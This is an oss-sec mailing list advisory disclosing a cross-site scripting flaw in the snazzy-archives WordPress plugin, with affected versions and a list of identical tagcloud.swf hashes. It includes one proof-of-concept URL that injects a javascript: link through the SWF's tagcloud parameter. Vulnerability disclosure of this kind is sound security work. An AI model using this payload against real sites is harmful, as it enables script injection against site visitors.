oss-sec mailing list archives
CVE-2009-4168: WordPress plugin snazzy-archives XSS vulnerability
From: Henri Salo <henri () nerv fi>
Date: Sun, 10 Mar 2013 11:47:37 +0200
Plugin URL: http://wordpress.org/extend/plugins/snazzy-archives/ Versions affected: 1.7.1 and below Reported to WordPress plugins team: 2013-02-03 Status: Plugin currently disabled by WordPress plugins team. Not fixed by plugin maintainer. PoC: wp-content/plugins/snazzy-archives/i/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert%28%22oss-security%20is%20great!%22%29%27+style=%27font-size:+40pt%27%3Efree%20pr0n%3C/a%3E%3C/tags%3E faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.6.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.5.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.3/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.4/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.6.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.5.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.4.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.4/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.5.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.2.3/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.5.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.0/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.7.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.5/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.3.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.2.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.6.3/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.5/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.7.0/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.3.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.0.1/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/1.2.2/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/tags/0.6/i/tagcloud.swf faa1b18d043ab7653e0f79d44450b802d2b6627e ./snazzy-archives/trunk/i/tagcloud.swf -- Henri Salo
Attachment:
signature.asc
Description: Digital signature
Current thread:
- CVE-2009-4168: WordPress plugin snazzy-archives XSS vulnerability Henri Salo (Mar 10)